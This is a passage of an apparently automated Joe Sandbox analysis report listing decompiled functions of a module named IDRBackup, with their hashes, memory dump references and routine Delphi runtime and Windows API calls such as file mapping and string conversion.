                                                                                                  • Opcode ID: 837f7ce824299e718ff31fc9975fec7b007778b051f42d7a6ff680c07298d06b
                                                                                                  • Instruction ID: 26df9d579ac72b310c812ec49e7277c3074fc2727e4b984d6bdc51d0e5f759bc
                                                                                                  • Opcode Fuzzy Hash: 837f7ce824299e718ff31fc9975fec7b007778b051f42d7a6ff680c07298d06b
                                                                                                  • Instruction Fuzzy Hash: 9CF082282045C0DAF676D7B0AC75F8923EC5724240FC14B17E905F7152D761C840ABA2
                                                                                                  Function 50003C94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 50003BF0: OpenFileMappingA.KERNEL32(00000004,00000000,Local\FastMM_PID_????????), ref: 50003C00
                                                                                                  • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000004,Local\FastMM_PID_????????), ref: 50003CBE
                                                                                                  • MapViewOfFile.KERNEL32(?,00000002,00000000,00000000,00000000), ref: 50003CD6
                                                                                                  • UnmapViewOfFile.KERNEL32(00000000,?,00000002,00000000,00000000,00000000), ref: 50003CE2
                                                                                                  Strings
                                                                                                  • Local\FastMM_PID_????????, xrefs: 50003CAF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$MappingView$CreateOpenUnmap
                                                                                                  • String ID: Local\FastMM_PID_????????
                                                                                                  • API String ID: 2158777448-3568460072
                                                                                                  • Opcode ID: 812e1af7b6a7b700a59ef8b948a59b648fbb4594b905c5d210d35c39233bdc6a
                                                                                                  • Instruction ID: 9257d67356388e225cbde0ea26a55ef2e4a99ea564a19721fac7c5c684e59e6f
                                                                                                  • Opcode Fuzzy Hash: 812e1af7b6a7b700a59ef8b948a59b648fbb4594b905c5d210d35c39233bdc6a
                                                                                                  • Instruction Fuzzy Hash: 71F09BB064538075F6319BB06C63F8522A85721B54FA00723F720FF0D3D7F19440575A
                                                                                                  Function 50003BF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 50003BBC: GetCurrentProcessId.KERNEL32(?,50003BF7,?,?,50003C61), ref: 50003BBD
                                                                                                  • OpenFileMappingA.KERNEL32(00000004,00000000,Local\FastMM_PID_????????), ref: 50003C00
                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,?,50003C61), ref: 50003C18
                                                                                                  • UnmapViewOfFile.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000,?,?,50003C61), ref: 50003C20
                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,50003C61), ref: 50003C26
                                                                                                  Strings
                                                                                                  • Local\FastMM_PID_????????, xrefs: 50003BF7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$View$CloseCurrentHandleMappingOpenProcessUnmap
                                                                                                  • String ID: Local\FastMM_PID_????????
                                                                                                  • API String ID: 3303930959-3568460072
                                                                                                  • Opcode ID: 7642a81f86c0cf429a4968a1d66b8e04bc81eebb4c9b12c163bbd6232915ee5e
                                                                                                  • Instruction ID: de9adb8942b47b404bea560d384b89a0808252958130f6c2296cf7b79e4161ec
                                                                                                  • Opcode Fuzzy Hash: 7642a81f86c0cf429a4968a1d66b8e04bc81eebb4c9b12c163bbd6232915ee5e
                                                                                                  • Instruction Fuzzy Hash: ABE0ECA17823A136F53172F02CA3F8A954C4F25A55F940B637700BA1C2DAE49C0012D8
                                                                                                  Function 50025D8C Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 50025D50: @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?), ref: 50025D6C
                                                                                                    • Part of subcall function 50025D50: @System@LoadResString$qqrp20System@TResStringRec.RTL120 ref: 50025D7E
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50025E8E,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50025DD9
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50025E8E,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50025DFC
                                                                                                    • Part of subcall function 50009D40: @System@@NewUnicodeString$qqri.RTL120(00000000,?,50004742), ref: 50009D5B
                                                                                                    • Part of subcall function 50009D40: @System@Move$qqrpxvpvi.RTL120(00000000,?,50004742), ref: 50009D69
                                                                                                    • Part of subcall function 50009D40: @System@@FreeMem$qqrpv.RTL120(50004742), ref: 50009D8B
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50025E8E,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50025E42
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50025E8E,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50025E65
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$StringSystem@@$Asg$qqrr20Stringx20$FreeLoadLocaleMem$qqrpvMove$qqrpxvpviStr$qqriix20String$qqriString$qqrp20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 943917607-0
                                                                                                  • Opcode ID: d9635f307f6dee683a94e50e8087e5007a6a068d91809b74f37d2b4e69d84ff6
                                                                                                  • Instruction ID: da8087070b0f5265adf1fffc26e669f63a26a283c91abc2d06778dd38358d0ac
                                                                                                  • Opcode Fuzzy Hash: d9635f307f6dee683a94e50e8087e5007a6a068d91809b74f37d2b4e69d84ff6
                                                                                                  • Instruction Fuzzy Hash: 4D31C332A015496FDB04CA84E881AAF77AEEF88310FA14637F909E7251D635FD0187D8
                                                                                                  Function 5000A2B4 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A2FE
                                                                                                  • @System@@NewUnicodeString$qqri.RTL120 ref: 5000A30F
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000,00000000), ref: 5000A357
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A365
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A37A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@System@@Unicode$Asg$qqrr20Clr$qqrpvLength$qqrr20Move$qqrpxvpviStringString$qqriStringiStringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 2014283384-0
                                                                                                  • Opcode ID: b61eede90e767d8fde67cc97024370c853bfedd394de62c8fd1a2fb42fa9bf36
                                                                                                  • Instruction ID: 3378d5cb028a156183957ae48023e964bc14677264a5555a71f0aa01a3d2e280
                                                                                                  • Opcode Fuzzy Hash: b61eede90e767d8fde67cc97024370c853bfedd394de62c8fd1a2fb42fa9bf36
                                                                                                  • Instruction Fuzzy Hash: 7921C1317061A28FF714EE18E570A5EB3E5EBD2300FA1873AE945C7111EB22ED418751
                                                                                                  Function 50008D7C Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@LStrSetLength$qqrv.RTL120 ref: 50008DC5
                                                                                                  • @System@@NewAnsiString$qqrius.RTL120 ref: 50008DD4
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000,00000000), ref: 50008E1A
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(00000000), ref: 50008E28
                                                                                                  • @System@@LStrAsg$qqrpvpxv.RTL120 ref: 50008E3D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$AnsiAsg$qqrpvpxvClr$qqrpvLength$qqrvMove$qqrpxvpviString$qqriusSystem@
                                                                                                  • String ID:
                                                                                                  • API String ID: 3139303677-0
                                                                                                  • Opcode ID: ab1dadf1f8bb6f253b1950cb49ad492068fbeb85a1bae5a0dea0bc8e953f108d
                                                                                                  • Instruction ID: 8200d2bf4dcf9fe215388774a5c81f53f67553e226669b9bf43c0643cec0f83f
                                                                                                  • Opcode Fuzzy Hash: ab1dadf1f8bb6f253b1950cb49ad492068fbeb85a1bae5a0dea0bc8e953f108d
                                                                                                  • Instruction Fuzzy Hash: C2219E713092828BE714EE19E9B0A6AB3E6FFE0300FA14B6BDAC5C7251DB31DC518751
                                                                                                  Function 500279E4 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@LStrAddRef$qqrpv.RTL120 ref: 500279F6
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,50027ABC), ref: 50027A2F
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,50027ABC), ref: 50027A79
                                                                                                  • @Sysutils@NextCharIndex$qqrx27System@%AnsiStringT$us$i0$%i.RTL120(00000000,50027ABC), ref: 50027A96
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(50027AC3), ref: 50027AB6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$AnsiStringSystem@%$FromInternalStr$qqrr27StringusSystem@T$us$i0$%x20Unicode$CharClr$qqrpvIndex$qqrx27NextRef$qqrpvSysutils@T$us$i0$%i
                                                                                                  • String ID:
                                                                                                  • API String ID: 3584664094-0
                                                                                                  • Opcode ID: 829ff8f312fc26a680b5dcbd4d1ee6f714a82b71f8e0defcbae22146eaef4f83
                                                                                                  • Instruction ID: 5ba0f4aa9d540899a6946def5b7f71f7a7c44f4c34a077cce08fafb771b80344
                                                                                                  • Opcode Fuzzy Hash: 829ff8f312fc26a680b5dcbd4d1ee6f714a82b71f8e0defcbae22146eaef4f83
                                                                                                  • Instruction Fuzzy Hash: 8921C430A06186EFEB11DFA4EA51ABDB7F5EBC4220F6002B5D448E7251D770AF41DB92
                                                                                                  Function 5000A464 Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A525), ref: 5000A4A0
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,5000A525), ref: 5000A4F9
                                                                                                  • @System@@UStrFromPCharLen$qqrr20System@UnicodeStringpci.RTL120(00000000,5000A525), ref: 5000A50A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FromSystem@System@@Unicode$AnsiCharLen$qqrr20Str$qqrr20StringStringx27System@%T$us$i0$%$InternalStringpbiStringpci
                                                                                                  • String ID:
                                                                                                  • API String ID: 1942119235-0
                                                                                                  • Opcode ID: fadb6b95d5fb1038a6ee0d324fefe7ba47ecd192cbbc44abc22f50522fcb7868
                                                                                                  • Instruction ID: ad8f59b466486c7b54756af4fb6304d0c882565156628c1f2bc0eb5e63542440
                                                                                                  • Opcode Fuzzy Hash: fadb6b95d5fb1038a6ee0d324fefe7ba47ecd192cbbc44abc22f50522fcb7868
                                                                                                  • Instruction Fuzzy Hash: 772108347025A4DFFB11DE64D9A55ADB3E5EBD6210BE04375E800C7305DBB4DE01D691
                                                                                                  Function 50027ACC Relevance: 7.6, APIs: 5, Instructions: 76COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50027B99,?,?,?,?), ref: 50027B18
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50027B99,?,?,?,?), ref: 50027B52
                                                                                                  • @Sysutils@NextCharIndex$qqrx20System@UnicodeStringi.RTL120(00000000,50027B99,?,?,?,?), ref: 50027B71
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$AnsiFromInternalStr$qqrr20StringStringx27System@%System@@T$us$i0$%$CharIndex$qqrx20NextStringiSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 112165042-0
                                                                                                  • Opcode ID: 5ab0ca6b7efa682e0a8c0cf649096109340480c0a6d78f3667cd2438d1eb862a
                                                                                                  • Instruction ID: 35ce13431533dfb919b24986911c6e13b21b563e3ea2f71161cf238d0aa8309e
                                                                                                  • Opcode Fuzzy Hash: 5ab0ca6b7efa682e0a8c0cf649096109340480c0a6d78f3667cd2438d1eb862a
                                                                                                  • Instruction Fuzzy Hash: BE21B631A0218AEFDF12DFA4EA417ADB7F5EF45310F6042A2D508A7151D3749E40DB90
                                                                                                  Function 500270C0 Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,50027182), ref: 50027108
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,?,00000000,50027182), ref: 50027136
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,?,00000000,50027182), ref: 50027145
                                                                                                  • @System@@IsClass$qqrp14System@TObjectp17System@TMetaClass.RTL120(00000000,50027182), ref: 50027154
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Exception@$bctr$qqrx20StringSysutils@Unicode$ClassClass$qqrp14LoadMetaObjectp17RecxiString$qqrp20Stringpx14System@@
                                                                                                  • String ID:
                                                                                                  • API String ID: 3708808660-0
                                                                                                  • Opcode ID: 114fbacdc6cb7fb3462a26799a0944743581bf824f00dcc18a41d0bfae1d8de9
                                                                                                  • Instruction ID: 33e2ff48ece4c1c09eb1b0648f1bee825e15256ae891d4046b3df70333a380a6
                                                                                                  • Opcode Fuzzy Hash: 114fbacdc6cb7fb3462a26799a0944743581bf824f00dcc18a41d0bfae1d8de9
                                                                                                  • Instruction Fuzzy Hash: F72192346015469FDB10CFACED919ADB7F5FF49300F508666E508D73A5DA30AE04CB90
                                                                                                  Function 500059EC Relevance: 7.6, APIs: 5, Instructions: 69fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@SetInOutRes$qqri.RTL120(?,?,?,50005AE5), ref: 50005A13
                                                                                                  • CreateFileW.KERNEL32(00000000,C0000000,?,00000000,00000002,00000080,00000000), ref: 50005A88
                                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 50005AA8
                                                                                                  • GetLastError.KERNEL32(000000F5), ref: 50005ABC
                                                                                                  • @System@SetInOutRes$qqri.RTL120(000000F5), ref: 50005AC1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Res$qqriSystem@$CreateErrorFileHandleLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 2961129769-0
                                                                                                  • Opcode ID: d63abc15d01510dc30b575c880705f7218f0e4a71d622e56fee6778df18cb518
                                                                                                  • Instruction ID: def1b6819490b2fa9b0a5e09cb0acd6702a6deccba95574e8a0b2e564d39748f
                                                                                                  • Opcode Fuzzy Hash: d63abc15d01510dc30b575c880705f7218f0e4a71d622e56fee6778df18cb518
                                                                                                  • Instruction Fuzzy Hash: B4113A61305281DAFB14DF58CCE079BA9959F87212FA4C356E5048F2E6E778CC40C397
                                                                                                  Function 500284FC Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500285AC,?,?,?,?,5002872E,?,?,00000001,5001BE14,00000000,5001BEBF,?,?,00000000), ref: 50028538
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500285AC,?,?,?,?,5002872E,?,?,00000001,5001BE14,00000000,5001BEBF,?,?,00000000), ref: 5002856B
                                                                                                  • @Sysutils@ByteType$qqrx20System@UnicodeStringi.RTL120(00000000,500285AC,?,?,?,?,5002872E,?,?,00000001,5001BE14,00000000,5001BEBF,?,?,00000000), ref: 50028586
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
